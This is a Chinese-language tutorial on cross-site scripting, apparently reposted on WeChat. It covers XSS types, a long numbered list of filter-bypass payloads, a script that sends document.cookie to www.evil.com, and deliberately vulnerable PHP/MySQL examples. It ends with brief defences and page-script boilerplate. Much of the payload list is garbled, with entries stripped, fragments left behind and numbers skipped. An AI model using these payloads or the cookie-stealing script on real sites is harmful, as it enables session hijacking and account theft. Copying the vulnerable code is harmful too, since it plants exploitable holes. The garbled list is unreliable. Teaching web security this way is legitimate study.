0x01、XSS的原理和分类

跨站脚本攻击XSS(Cross Site Scripting)，为了不和层叠样式表(Cascading Style Sheets，CSS)的缩写混淆

故将跨站脚本攻击缩写为XSS，恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页面时，嵌入Web里面的Script代码会被执行，从而达到恶意攻击用户的目的，XSS攻击针对的是用户层面的攻击；

XSS分为：存储型，反射型，DOM型XSS

存储型XSS：存储型XSS，持久化，代码是存储在服务器中，如在个人信息或发表文章等地方，插入代码，如果没有过滤或者过滤不严，那么这些代码将储存到数据库中，用户访问该页面的时候出发代码执行，这种XSS比较危险，容易造成蠕虫，盗取Cookie；

反射型XSS：非持久化，需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容)，一般容易出现在搜索页面，反射性XSS大多数是用来盗取用户的Cookie信息；

DOM型XSS:不经过后端，DOM-XSS漏洞是基于文档对象模型(Document Object Model ,DOM)的一种漏洞，DOM-XSS是用过url传入参数取控制触发的，其实也属于反射型XSS，DOM的详解：DOM文档对象模型；

可能触发DOM型XSS的属性

• document.referer

• window.name

• location

• innerHTML

• documen.write

0x02、XSS攻击的危害

1、盗取各类用户账号，如机器登陆账号，用户网银账号，各类管理员账号；

2、控制企业数据，包括读取，篡改，添加，删除企业敏感数据的能力；

3、盗取企业重要的具有商业价值的资料；

4、非法转账；

5、强制发送电子邮件；

6、网站挂马；

7、控制受害者机器向其他网站发起攻击；

0x03、XSS的测试语句

在网站是否存在XSS漏洞时，应该输入一些标签，如输入后查看网页源代码是否过滤标签，如果没有过滤，很大可能存在XSS漏洞。

常用测试语句：

1

1

可以看到，网站并没有对标签进行过滤；

可以看到，并没有弹出，但是控制台上输出了1，我们可以确定，确实存在XSS；

闭合问题：很多时候，在测试XSS的时候，想要要考虑到闭合问题，我们首先查看网页的源代码，需要首先判断出来，网站用的时单引号闭合还是双引号闭合；

"> x

'> x

单行注释：

"> x // #双斜杠表示注释掉后面的语句

0x04、XSS攻击语句

输入检测确定标签没有过滤，为了显示漏洞存在，需要插入XSS攻击代码；

aa
(1)普通的 XSS JavaScript 注入

(2)IMG 标签 XSS 使用 JavaScript 命令

(3)IMG 标签无分号无引号

(4)IMG 标签大小写不敏感

(5)HTML 编码(必须有分号)

(6)修正缺陷 IMG 标签
">
(7)formCharCode 标签(计算器)

(8)UTF-8 的 Unicode 编码(计算器)

(9)7 位的 UTF-8 的 Unicode 编码是没有分号的(计算器)

(10)十六进制编码也是没有分号(计算器)

(11)嵌入式标签,将 Javascript 分开

(12)嵌入式编码标签,将 Javascript 分开

(13)嵌入式换行符

(14)嵌入式回车

(15)嵌入式多行注入 JavaScript,这是 XSS 极端的例子

(16)解决限制字符(要求同页面)
cript>z=z+'
src=ht'
(21)Non-alpha-non-digit XSS to 2

(22)Non-alpha-non-digit XSS to 3

(23)双开括号
<
(24)无结束脚本标记(仅火狐等浏览器)

(29)换码过滤的 JavaScript
\";alert('XSS');//
(30)结束 Title 标签

(31)Input Image

(32)BODY Image

(33)BODY 标签

(34)IMG Dynsrc

(35)IMG Lowsrc

(36)BGSOUND

(37)STYLE sheet

(38)远程样式表

(39)List-style-image(列表式)





    
XSS
(40)IMG VBscript
XSS
(41)META 链接 url

(42)Iframe

(43)Frame
12-7-1 T00LS - Powered by Discuz!
Boardhttps://www.a.com/viewthread.php?action=printable&tid=15267 3/6
(44)Table

(45)TD

(46)DIV background-image

(47)DIV background-image 后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)

(48)DIV expression

(49)STYLE 属性分拆表达

(50)匿名 STYLE(组成:开角号和一个字母开头)

(51)STYLE background-image

(52)IMG STYLE 方式
exppression(alert("XSS"))'>
(53)STYLE background

(54)BASE

(55)EMBED 标签,你可以嵌入 FLASH,其中包涵 XSS

(56)在 flash 中使用 ActionScrpt 可以混进你 XSS 的代码
a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval_r(a+b+c+d);
(57)XML namespace.HTC 文件必须和你的 XSS 载体在一台服务器上
implementation="http://3w.org/XSS/xss.htc">XSS
(58)如果过滤了你的 JS 你可以在图片里添加 JS 代码来利用

(59)IMG 嵌入式命令,可执行任意命令

(60)IMG 嵌入式命令(a.jpg 在同服务器)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61)绕符号过滤

(62)
(63)
(64)
(65)
(66)12-7-1 T00LS - Powered by Discuz! Board
https://www.a.com/viewthread.php?action=printable&tid=15267 4/6SRC="http://3w.org/xss.js">
(67)PT SRC="http://3w.org/xss.js">
(68)URL 绕行
XSS
(69)URL 编码
XSS
(70)IP 十进制
(71)IP 十六进制
(72)IP 八进制
(73)混合编码
XSS
(74)节省[http:]
XSS
(75)节省[www]
XSS
(76)绝对点绝对 DNS
XSS
(77)javascript 链接
XSS
各个标签的的攻击语句；
   #弹出hack
   #弹出hack
        #弹出1，对于数字可以不用引号
      #弹出cookie
  #引用外部的xss
svg标签：

标签：

  #弹出cookie
标签：



video 标签：

style标签：

0x05、XSS漏洞的挖掘
5.1、黑盒测试
尽可能找到一切用户可控并且能够输出在页面代码中的地方，比如下面这些：
URL的每一个参数
URL本身




    
表单
搜索框
5.2、常见业务场景
重灾区：评论区，留言区，个人信息，订单信息等
针对型：站内信，网页及时通讯，私信，意见反馈
存在风险：搜索框，当前目录，图片属性等；
5.3、白盒审计
关于XSS的代码审计主要就是从接收参数的地方和一些关键此入手；
PHP中常见的接收参数的方法有$_GET，$_POST，$_REQUEST等等，可以搜索所有接收参数的方法，然后对接收到的数据进行跟踪，看看有没有输出到页面中，然后看看输出到页面中的数据是否进行了过滤和html编码等处理
也可以搜索类似echo这样的输出语句，跟踪输出的变量是从哪里来的，我们是否能控制，如果从数据库中取得，是否能控制存到数据库得数据，存到数据库之前有没有得到过滤等等；
大多数程序会对接收参数封装在公共文件得函数中统一调用，我们就需要审计这些公共函数看有没有过滤，能否绕过等等；
同理审计DOM型注入可以搜索一些js操作DOM元素得关键字进行审计；
0x06、XSS的攻击过程
6.1、反射型XSS漏洞：
1、Alice经常浏览某个网站，此网站为Bob所拥有，Bob的站点需要Alice使用用户名、密码进行登陆，并存储了Ailce敏感信息(比如银行账户)；
2、Tom发现Bob的站点存在反射的XSS漏洞；
3、Tom利用Bob网站的反射型XSS漏洞编写了一个exp，做成链接的形式，并利用各种手段诱导Alice点击
4、Alice在登陆Bob的站点后，浏览了Tom提供的恶意链接；
5、嵌入到恶意链接中的恶意脚本在Alice的浏览器中执行，此脚本盗取敏感信息(cookie,账号等信息)，然后在Alice完全不知情的情况下将这些信息发送给了Tom；
6、Tom利用获取到的Cookie就可以以Alice的身份信息登陆Bob的站点，如果脚本的功能更强大的化，Tom还可以对Alice的浏览器做控制并进一步利用漏洞控制；
6.2、存储型XSS漏洞：
1、Bob拥有一个Web站点，该站点允许用户发布信息，浏览已发布的信息；
2、Tom检测到Bob的站点存在存储型的XSS漏洞；
3、Tom在Bob的网站发布了一个带有恶意脚本的热点信息，该热点信息存储在了Bob的服务器的数据库中，然后吸引其他用户来阅读该热点信息；
4、Bob或者时任何的其他人，如Alice浏览了该信息之后，Tom的恶意脚本就会执行；
5、Tom的恶意脚本执行后，Tom就可以对浏览器该页面的用户发起一次XSS攻击；
0x07、XSS攻击测试
7.1、远程加载攻击payload
XSS漏洞能够通过构造恶意的XSS语句实现很多功能，其中做常用的时，构建XSS恶意代码获取对方浏览器的COOKIE；
1）我们首先把恶意代码保存在本地kali里面，实战情况下，我们将代码保存在我们的服务器上；
var img=document.createElement("img");
img.src="http://www.evil.com/log?"+escape(document.cookie);
document.body.appendChild(img);
2）我们在kali，用python开启http服务；
python -m http.server 80
3）我们在有XSS漏洞的地方，远程加载我们的恶意代码：
看到浏览器加载了，我们的xss恶意代码；
4）成功获取到了cookie信息
5）图片创建链接
onerror=document.body.appendChild(document.createElement('script')).src='//192.168.0.110/xss.
js'>
6）字符拼接
这种一般是输入的字符有限制的时候使用










有的情况要用/**/注释不需要的代码。





    
7）jQuery加载

7.2、反射型XSS：
//前端 1.html：


    
    


    

        
        
    



 
//后端 action.php：
    $name=$_POST["name"]; 
  echo $name;
?>
我们接着在输入框输入:
页面直接弹出了xss的页面，可以看到， 我们插入的语句已经被页面给执行了，这就是最基本的反射型XSS漏洞，这种漏洞流向：前端-->后端-->前端
7.3、存储型XSS：
//前端：2.html


    
    


    

        输入你的ID： 

        输入你的Name： 

        
    



//后端：action2.php
  $id=$_POST["id"];
  $name=$_POST["name"];
  mysql_connect("localhost","root","root");
  mysql_select_db("test");

  $sql="insert into xss value ($id,'$name')";
  $result=mysql_query($sql);
?>
//供其他用户访问页面：show2.php
  mysql_connect("localhost","root","root");
  mysql_select_db("test");
  $sql="select * from xss where id=1";
  $result=mysql_query($sql);
  while($row=mysql_fetch_array($result)){
    echo $row['name'];
  }
?>
这里有一个用户提交页面，数据提交给后端之后，后端存储在数据库中，然后当其他用户访问另一个页面的时候，后端调出该数据，显示给另一个用户，XSS代码就被执行了；
我们输入3和，接着，我们看看数据库；
可以看到，我们的XSS语句已经插入到数据库中了；
然后当其他用户访问，show2.php页面的时候，我们插入的XSS代码就执行了；
存储型XSS的数据流向是：前端-->后端-->数据库-->后端-->前端
7.4、DOM型XSS
先放源代码：
// 前端3.html

  

  
  
  
  
  

  
  
  

  
  
  // 后端action3.php
    $name=$_POST["name"];
?>



这里有一个提交页面，用户可以在此提交数据，数据提交之后，给后台处理；
我们可以输入,然后看看页面的变化；
页面直接弹出了hack的页面，我们插入的语句已经被页面给执行了；
这就是DOM型XSS的漏洞，这种漏洞的数据流向是：前端-->浏览器
0x08、XSS编码绕过
8.1、gpc过滤字符
如果gpc开启的时候，特殊字符会被加上斜杠即，'变成'，xss攻击代码不要用带单引号和双引号；
绕过gpc在php高版本gpc默认是没有的，但是开发程序员会使用addcslashes()对特殊字符进行转义；
这个是执行不了的
没有单引号可执行




    
8.2、过滤alert
当页面过滤alert这个函数时，因为这个函数会弹窗，不仅很多程序会对他进行过滤，而且很多waf都会对其进行拦截，所以不存在alert即可；



8.3、过滤标签
在程序里如果使用了html实体过滤，在php会使用htmlspecialchars()对输入的字符进行实体化，实体化之后的字符不会在html执行，把预定义的字符""(大于)转化为HTML实体，构造xss恶意代码大多数都必须使用，这两个字符被实体化之后，html里就不能执行了；
预定义的字符是：
&(和号)成为&
“(双引号)成为"
’(单引号)成为'
>(大于)成为>

8.4、ascii编码

8.5、url编码
123
Web安全之一文看懂XSS
8.6、JS编码
编码直通车：https://www.jb51.net/tools/zhuanhuan.htm
八进制编码：

16进制编码

jsunicode编码

8.7、HTML编码
在=后可以解析html编码
十进制：

Button
十六进制
''
8.8、base64编码
使用伪协议base64解码执行xss
111







    
0x09、XSS的防御
XSS防御的总体思路是：对用户的输入(和URL参数)进行过滤，对输出进行html编码，也就是对用户提交的所有内容进行过滤，对url中的参数进行过滤，过滤掉会导致脚本执行的相关内容，然后对动态输出到页面的内容进行html编码，使脚本无法在浏览器中执行；
对输入的内容进行过滤，可以分为黑名单和白名单过滤，黑名单过滤虽然可以拦截大部分的XSS攻击，但是还是存在被绕过的风险，白名单过滤虽然可以基本杜绝XSS攻击，但是真实环境中一般是不能进行如此严格的白名单过滤的；
对输出进行html编码，就是通过函数，将用户的输入的数据进行html编码，使其不能作为脚本运行；
如下是使用php中的htmlspecialchars函数对用户输入的name参数进行html编码，将其转化为html实体；
#使用htmlspecialchars函数对用户输入的name参数进行html编码，将其转换为html实体
$name = htmlspecialchars( $_GET[ 'name' ] );
我们还可以服务端设置会话Cookie的HTTP Only属性，这样客户端的JS脚本就不能获取Cookie信息了；
本文作者：wangkun05， 转载请注明来自FreeBuf.COM
如有侵权，请联系删除
推荐阅读
实战|记一次奇妙的文件上传getshell
「 超详细 | 分享 」手把手教你如何进行内网渗透
神兵利器 | siusiu-渗透工具管理套件
一款功能全面的XSS扫描器
实战 | 一次利用哥斯拉马绕过宝塔waf
BurpCrypto: 万能网站密码爆破测试工具
快速筛选真实IP并整理为C段 -- 棱眼
自动探测端口顺便爆破工具t14m4t
渗透工具｜无状态子域名爆破工具（1秒扫160万个子域）

查看更多精彩内容，还请关注橘猫学安全
每日坚持学习与分享，觉得文章对你有帮助可在底部给点个“再看”


          
        
                        
预览时标签不可点
                
        


        
        

          

    

    
    

                        

    

      
            
            
          
  
  

        


                
              
    

    


    
    

      

        
        

      
    

    
    

      

        

          
          
微信扫一扫
关注该公众号
        
      
    
  
  
  


  

    
  继续滑动看下一个
  












  

  

    
    

              轻触阅读原文
          
    

      

        

          

            

              

                

                  

                    
                                          
                                        




    

                  
                  

                    

                      

                        橘猫学安全                      
                    
                  
                
              
            
          
        
    
        

          

                                                          
        
      
      

    
  
  

    

      

        
        向上滑动看下一个
      
    
  














  

    

    
  




  

  

    

    

      知道了
    
  








  

      

          
          微信扫一扫
使用小程序
      
  


  

  

      

          
      
      

      
      

          取消
          允许
      
  


  

  

    

      
    
    

    
    

      取消
      允许
    
  




  
  

    

      

    
    

  
    
    

：
，
。
 


视频
小程序


赞
，轻点两下取消赞
在看
，轻点两下取消在看
分享
留言
收藏

    
    
    




    
';
      videoPlaceHolderSpan.style.cssText = "width: " + obj.w + "px !important;";

      insertAfter(videoPlaceHolderSpan, a);

      

      var mid = "2247512401" || "" || "";
      var biz = "Mzg5OTY2NjUxMw==" || "";
      var sessionid = "" || "svr_49aa8e953a7";
      var idx = "2" || "";
      var hitInfos = [
              ];

      (function setHitStyle(parentNode, copyIframe, index, vid) {
        var ret = (hitInfos || []).find(info => info.video_id === vid);
        if (!ret) return;
        var ori = ret.ori_status;
        var hit_biz_headimg = ret.hit_biz_headimg + '/64';
        var hit_nickname = ret.hit_nickname;
        var hit_username = ret.hit_username;
        var sourceBiz = ret.hit_bizuin;

        var selfUserName = "gh_af700ee13397";

        if (ori === 2 && selfUserName !== hit_username) {
          var videoBar = document.createElement('div');
          var videoBarHtml = '
';
          videoBarHtml += '
以下视频来源于
';
          videoBarHtml += '
';
          videoBarHtml += '
';
          videoBarHtml += '
' + hit_nickname + '
';
          videoBarHtml += '';
          videoBarHtml += '
';
          videoBarHtml += '
';
          videoBarHtml += '
';
          videoBar.innerHTML = videoBarHtml;
          var spanContainer = document.getElementById('js_mp_video_container_' + index);
          if (spanContainer) {
            spanContainer.parentNode.insertBefore(videoBar, spanContainer);
          } else if (parentNode.contains && parentNode.contains(copyIframe)) {
            parentNode.insertBefore(videoBar, copyIframe);
          } else {
            parentNode.insertBefore(videoBar, parentNode.firstElementChild);
          }
          var avatorEle = document.getElementById(hit_biz_headimg + index);
          var avatorSrc = avatorEle.dataset.src;
          console.log('avatorSrc' + avatorSrc);
          if (ret.hit_biz_headimg) {
            avatorEle.style.backgroundImage = 'url(' + avatorSrc + ')';
          }
        }
      })(a.parentNode, a, i, vid);

      a.style.cssText += ";width: " + obj.w + "px !important;";
      a.setAttribute("width", obj.w);
      if (window.__zoom != 1) {
        a.style.display = "block";
        videoPlaceHolderSpan.style.display = "none";
        a.setAttribute("_ratio", obj.ratio);
        a.setAttribute("_vid", vid);
      } else {
        videoPlaceHolderSpan.style.cssText += "height: " + (obj.h - obj.sdh) + "px !important;margin-bottom: " + obj.sdh + "px !important;";
        a.style.cssText += "height: " + obj.h + "px !important;";
        a.setAttribute("height", obj.h);
      }
      a.setAttribute("data-vh", obj.vh);
      a.setAttribute("data-vw", obj.vw);
      if (a.getAttribute("data-mpvid")) {
        a.setAttribute("data-src", location.protocol + "//mp.weixin.qq.com/mp/readtemplate?t=pages/video_player_tmpl&auto=0&vid=" + vid);
      } else {
        a.setAttribute("data-src", location.protocol + "//v.qq.com/iframe/player.html?vid=" + vid + "&width=" + obj.vw + "&height=" + obj.vh + "&auto=0");
      }
    }
  })();

  (function () {
    if (window.__zoom != 1) {
      if (!window.__second_open__) {
        document.getElementById('page-content').style.zoom = window.__zoom;
        var a = document.getElementById('activity-name');
        var b = document.getElementById('meta_content');
        if (!!a) {
          a.style.zoom = 1 / window.__zoom;
        }
        if (!!b) {
          b.style.zoom = 1 / window.__zoom;
        }
      }
      var images = document.getElementsByTagName('img');
      for (var i = 0, il = images.length; i < il; i++) {
        if (window.__second_open__ && images[i].getAttribute('__sec_open_place_holder__')) {
          continue;
        }
        images[i].style.zoom = 1 / window.__zoom;
      }
      var iframe = document.getElementsByTagName('iframe');
      for (var i = 0, il = iframe.length; i < il; i++) {
        if (window.__second_open__ && iframe[i].getAttribute('__sec_open_place_holder__')) {
          continue;
        }
        var a = iframe[i];
        a.style.zoom = 1 / window.__zoom;
        var src_ = a.getAttribute('data-src') || "";
        if (!/^http(s)*\:\/\/v\.qq\.com\/iframe\/(preview|player)\.html\?/.test(src_)
          && !/^http(s)*\:\/\/mp\.weixin\.qq\.com\/mp\/readtemplate\?t=pages\/video_player_tmpl/.test(src_)
        ) {
          continue;
        }
        var ratio = a.getAttribute("_ratio");
        var vid = a.getAttribute("_vid");
        a.removeAttribute("_ratio");
        a.removeAttribute("_vid");
        var vw = a.offsetWidth - (getOuterW(a) || 0);
        var vh = vw / ratio;
        var h = vh + (getOuterH(a) || 0)
        a.style.cssText += "height: " + h + "px !important;"
        a.setAttribute("height", h);
        if (/^http(s)*\:\/\/v\.qq\.com\/iframe\/(preview|player)\.html\?/.test(src_)) {
          a.setAttribute("data-src", location.protocol + "//v.qq.com/iframe/player.html?vid=" + vid + "&width=" + vw + "&height=" + vh + "&auto=0");
        }
        a.style.display = "none";
        var parent = a.parentNode;
        if (!parent) {
          continue;
        }
        for (var j = 0, jl = parent.children.length; j < jl; j++) {
          var child = parent.children[j];
          if (child.className.indexOf("js_img_placeholder") >= 0 && child.getAttribute("data-vid") == vid) {
            child.style.cssText += "height: " + h + "px !important;";
            child.style.display = "";
          }
        }
      }
    }
  })();
})();
var anchor_tree_msg = '';




    
',
    config: [{
      querySelector: 'redpacketcover',
      
      genId: function genId() {
        var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
        return decodeURIComponent(opt.node.getAttribute('data-coveruri') || '');
      },
      
      calW: function calW() {
        var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
        return opt.parentWidth * 0.7854;
      },
      
      calH: function calH() {
        var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
        return this.calW({
          parentWidth: opt.parentWidth
        }) / 0.73346 + 27 + 37;
      },
      replaceContentCssText: '',
      outerContainerLeft: '',
      outerContainerRight: ''
    },
    {
      querySelector: 'mppoi',
      genId: function genId() {
        var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
        return opt.node.getAttribute('data-id') || '';
      },
      calW: function calW() {
        var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
        return opt.parentWidth * 1;
      },
      calH: function calH() {
        return 219;
      },
      replaceContentCssText: '',
      appendContentCssText: 'diplay:block;',
      outerContainerLeft: '',
      outerContainerRight: ''
    },
    {
      querySelector: 'mpsearch',
      genId: function genId() {
        return decodeURIComponent('mp-common-search');
      },
      calW: function calW() {
        var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
        return opt.parentWidth * 1;
      },
      calH: function calH() {
        return 100;
      },
      replaceContentCssText: '',
      appendContentCssText: 'diplay:block;',
      outerContainerLeft: '',
      outerContainerRight: ''
    },
    {
      querySelector: 'mpvideosnap',
      genId: function genId() {
        var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
        var type = opt.node.getAttribute('data-type') || 'video';
        if (type === 'live') {
          return decodeURIComponent(opt.node.getAttribute('data-noticeid') || '');
        }
        return decodeURIComponent(opt.node.getAttribute('data-id') || '');
      },
      calW: function calW() {
        var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
        var type = opt.node.getAttribute('data-type') || 'video';
        var width = opt.node.getAttribute('data-width') || '';
        var height = opt.node.getAttribute('data-height') || '';
        if (type === 'live' || type === 'topic') {
          return opt.parentWidth;
        }
        var ratio = 1;
        ratio = width / height;
        var computedHeight = 0;
        var computedWidth = 0;
        var isHorizontal = false;
        if (ratio === 1 || ratio === 3 / 4) ; else if (ratio === 4 / 3 || ratio === 16 / 9) {
          isHorizontal = true;
        } else if (ratio < 3 / 4) {
          ratio = 3 / 4;
        } else if (ratio > 1 && ratio < 4 / 3) {
          ratio = 1;
        } else if (ratio > 4 / 3) {
          isHorizontal = true;
        } else if (typeof ratio === 'number' && !Object.is(ratio, NaN)) ; else {
          ratio = 1;
        }
        opt.node.setAttribute('data-ratio', ratio);
        opt.node.setAttribute('data-isHorizontal', isHorizontal);
        if (isHorizontal === true) {
          computedWidth = opt.parentWidth;
        } else {
          if (window.innerWidth < 1024) {
            computedWidth = window.innerWidth * 0.65;
          } else {
            computedWidth = opt.parentWidth * 0.65;
          }
        }
        computedHeight = computedWidth / ratio;
        computedHeight = Math.round(computedHeight);
        computedWidth = Math.round(computedWidth);
        opt.node.setAttribute('data-computedWidth', computedWidth);
        opt.node.setAttribute('data-computedHeight', computedHeight);
        return computedWidth;
      },
      calH: function calH() {
        var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
        var desc = opt.node.getAttribute('data-desc') || '';
        var type = opt.node.getAttribute('data-type') || 'video';
        var computedHeight = opt.node.getAttribute('data-computedHeight') || '';
        switch (type) {
          case 'live':
            return desc ? 152 : 116;
          case 'topic':
            return 201;
          case 'image':
          case 'video':
            return parseFloat(computedHeight);
        }
      },
      getBorderRadius: function getBorderRadius() {
        var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
        var type = opt.node.getAttribute('data-type') || 'video';
        if (type === 'video') {
          return 4;
        }
        return 8;
      },
      replaceContentCssText: '',
      appendContentCssText: 'display:flex;margin:0px auto;',
      outerContainerLeft: '',
      outerContainerRight: ''
    }, {
      querySelector: 'mp-wxaproduct',
      genId: function genId() {
        var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
        return decodeURIComponent(opt.node.getAttribute('data-wxaproduct-productid') || '');
      },
      calW: function calW() {
        var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
        return opt.parentWidth * 1 || '100%';
      },
      calH: function calH() {
        var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
        var cardtype = opt.node.getAttribute('data-wxaproduct-cardtype') || '';
        return cardtype === 'mini' ? 124 : 466;
      },
      replaceContentCssText: '',
      outerContainerLeft: '',
      outerContainerRight: ''
    }, {
      querySelector: 'mpprofile',
      genId: function genId(opt) {
        return opt.node.getAttribute('data-id') || '';
      },
      calW: function calW() {
        var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
        return opt.parentWidth * 1;
      },
      calH: function calH() {
        return 143;
      },
      replaceContentCssText: '',
      appendContentCssText: 'diplay:block;',
      outerContainerLeft: '',
      outerContainerRight: ''
    },
    {
      querySelector: 'mp-common-product',
      genId: function genId(opt) {
        return opt.node.getAttribute('data-windowproduct') || '';
      },
      calW: function calW() {
        var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
        return opt.parentWidth * 1 || '100%';
      },
      calH: function calH(opt) {
        var customstyle = opt.node.getAttribute('data-customstyle') || '{}';
        if (customstyle) {
          try {
            var _JSON$parse = JSON.parse(customstyle),
              display = _JSON$parse.display,
              height = _JSON$parse.height;
            if (display !== 'none') {
              var customHeight = height.split('px')[0];
              var ratio = opt.parentWidth / 350.0 || 1;
              customHeight = Math.round(customHeight * ratio);
              return customHeight;
            }
            return 0;
          } catch (err) {
            console.error(err);
          }
        }
        return 0;
      },
      replaceContentCssText: '',
      appendContentCssText: 'diplay:block;',
      outerContainerLeft: '
',
      outerContainerRight: '
'
    }, {
      querySelector: 'mpcps:not([data-templateid="video-play"]),mp-common-cpsad:not([data-templateid="video-play"])',
      genId: function genId(opt) {
        var node = opt.node;
        var planId = node.getAttribute('data-planid');
        var goodId = node.getAttribute('data-pid');
        return goodId || planId || '';
      },
      calW: function calW() {
        var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
        var node = opt.node;
        var templateId = node.getAttribute('data-templateid');
        var adType = node.getAttribute('data-adtype');
        var width = 0;
        if (templateId === 'list') {
          width = '100%';
        } else if (templateId === 'card') {
          if (adType === AD_CONFIG.CPS_GOODS_TYPE.SHORT_PLAY) {
            width = opt.parentWidth ? opt.parentWidth * 0.65 : '100%';
          } else {
            width = '100%';
          }
        }
        return width;
      },
      calH: function calH(opt) {
        var node = opt.node;
        var templateId = node.getAttribute('data-templateid');
        var adType = node.getAttribute('data-adtype');
        var height = 0;
        if (templateId === 'list') {
          height = 120;
        } else if (templateId === 'card') {
          if (adType === AD_CONFIG.CPS_GOODS_TYPE.SHORT_PLAY) {
            var width = opt.parentWidth * 0.65;
            height = Math.ceil(width * (4 / 3)) + 68;
          } else {
            height = Math.ceil(opt.parentWidth + 111);
          }
        }
        return height;
      },
      replaceContentCssText: '',
      appendContentCssText: 'diplay:block;',
      outerContainerLeft: '
',
      outerContainerRight: '




    
'
    }
    ]
  };
  function preloadingInit() {
    var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
    if (typeof document.querySelectorAll !== 'function') {
      return;
    }
    var g = {
      maxWith: document.getElementById('img-content').getBoundingClientRect().width,
      idAttr: 'data-preloadingid'
    };
    for (var i = 0, il = opt.config.length; i < il; i++) {
      var a = opt.config[i];
      var list = document.querySelectorAll(a.querySelector);
      for (var j = 0, jl = list.length; j < jl; j++) {
        var node = list[j];
        var parentWidth = node.parentNode.getBoundingClientRect().width;
        parentWidth = Math.min(parentWidth, g.maxWith);

        if (node.getAttribute('has-insert-preloading')) {
          continue;
        }
        var nodeW = a.calW({
          parentWidth: parentWidth,
          node: node
        });
        var nodeH = a.calH({
          parentWidth: parentWidth,
          node: node
        });
        var nodeId = a.genId({
          index: j,
          node: node
        });
        var nodeBorderRadius = typeof a.getBorderRadius === 'function' ? a.getBorderRadius({
          index: j,
          node: node
        }) : 8;

        if (typeof nodeW === 'number') {
          nodeW += 'px';
        }
        var imgHtml = opt.defaultContentTpl.replace(/#height#/g, nodeH).replace(/#width#/g, nodeW).replace(/#borderRadius#/g, nodeBorderRadius);
        var tmpNode = document.createElement('div');
        tmpNode.innerHTML = imgHtml;
        if (a.replaceContentCssText) {
          var replaceContentCssText = a.replaceContentCssText.replace(/#height#/g, nodeH).replace(/#width#/g, nodeW);
          tmpNode.firstChild.style.cssText = replaceContentCssText;
        } else if (a.appendContentCssText) {
          tmpNode.firstChild.style.cssText += a.appendContentCssText;
        }
        var html = (a.outerContainerLeft || '') + tmpNode.innerHTML + (a.outerContainerRight || '');
        tmpNode.innerHTML = html;
        tmpNode.firstChild.setAttribute(g.idAttr, nodeId);
        node.parentNode.insertBefore(tmpNode.firstChild, node.nextSibling);
        node.setAttribute('has-insert-preloading', '1');
      }
    }
  }
  function init() {
    preloadingInit(g);
  }

  function decode(str) {
    var replace = ["`", "`", "'", "'", """, '"', " ", " ", ">", ">", "<", "<", "¥", "¥", "&", "&"];
    for (var i = 0; i < replace.length; i += 2) {
      str = str.replace(new RegExp(replace[i], 'g'), replace[i + 1]);
    }
    return str;
  }
  function getQuery(url) {
    url = url || 'http://qq.com/s?a=b#rd';
    var tmp = url.split('?'),
      query = (tmp[1] || '').split('#')[0].split('&'),
      params = {};
    for (var i = 0; i < query.length; i++) {
      var eqIndex = query[i].indexOf('=');
      if (eqIndex > -1) {
        var arg = query[i].substring(0, eqIndex);
        params[arg] = query[i].substring(eqIndex + 1);
      }
    }
    if (params['pass_ticket']) {
      params['pass_ticket'] = encodeURIComponent(decode(params['pass_ticket']).replace(/\s/g, '+'));
    }
    return params;
  }

  function insertAfter(dom, afterDom) {
    var _p = afterDom.parentNode;
    if (!_p) {
      return;
    }
    if (_p.lastChild === afterDom) {
      _p.appendChild(dom);
    } else {
      _p.insertBefore(dom, afterDom.nextSibling);
    }
  }

  if (typeof getComputedStyle === 'undefined') {
    if (document.body.currentStyle) {
      window.getComputedStyle = function (el) {
        return el.currentStyle;
      };
    } else {
      window.getComputedStyle = {};
    }
  }
  function getMaxWith() {
    var container = document.getElementById('img-content');
    var max_width = container.offsetWidth;
    var container_padding = 0;
    var container_style = getComputedStyle(container);
    container_padding = parseFloat(container_style.paddingLeft) + parseFloat(container_style.paddingRight);
    max_width -= container_padding;
    if (!max_width) {
      max_width = window.innerWidth - 32;
    }
    return max_width;
  }
  function getParentWidth(dom) {
    var parent_width = 0;
    var parent = dom.parentNode;
    var outerWidth = 0;
    while (true) {
      if (!parent || parent.nodeType !== 1) break;
      var parent_style = getComputedStyle(parent);
      if (!parent_style) break;
      parent_width = parent.clientWidth - parseFloat(parent_style.paddingLeft) - parseFloat(parent_style.paddingRight) - outerWidth;
      if (parent_width > 16) break;
      outerWidth += parseFloat(parent_style.paddingLeft) + parseFloat(parent_style.paddingRight) + parseFloat(parent_style.marginLeft) + parseFloat(parent_style.marginRight) + parseFloat(parent_style.borderLeftWidth) + parseFloat(parent_style.borderRightWidth);
      parent = parent.parentNode;
    }
    if (parent_width < 0) {
      return 0;
    }
    return parent_width;
  }
  function getOuterW(dom) {
    var style = getComputedStyle(dom),
      w = 0;
    if (!!style) {
      w = parseFloat(style.paddingLeft) + parseFloat(style.paddingRight) + parseFloat(style.borderLeftWidth) + parseFloat(style.borderRightWidth);
    }
    return w;
  }
  function getOuterH(dom) {
    var style = getComputedStyle(dom),
      h = 0;
    if (!!style) {
      h = parseFloat(style.paddingTop) + parseFloat(style.paddingBottom) + parseFloat(style.borderTopWidth) + parseFloat(style.borderBottomWidth);
    }
    return h;
  }
  function getVideoWh(dom) {
    var max_width = getMaxWith(),
      width = max_width,
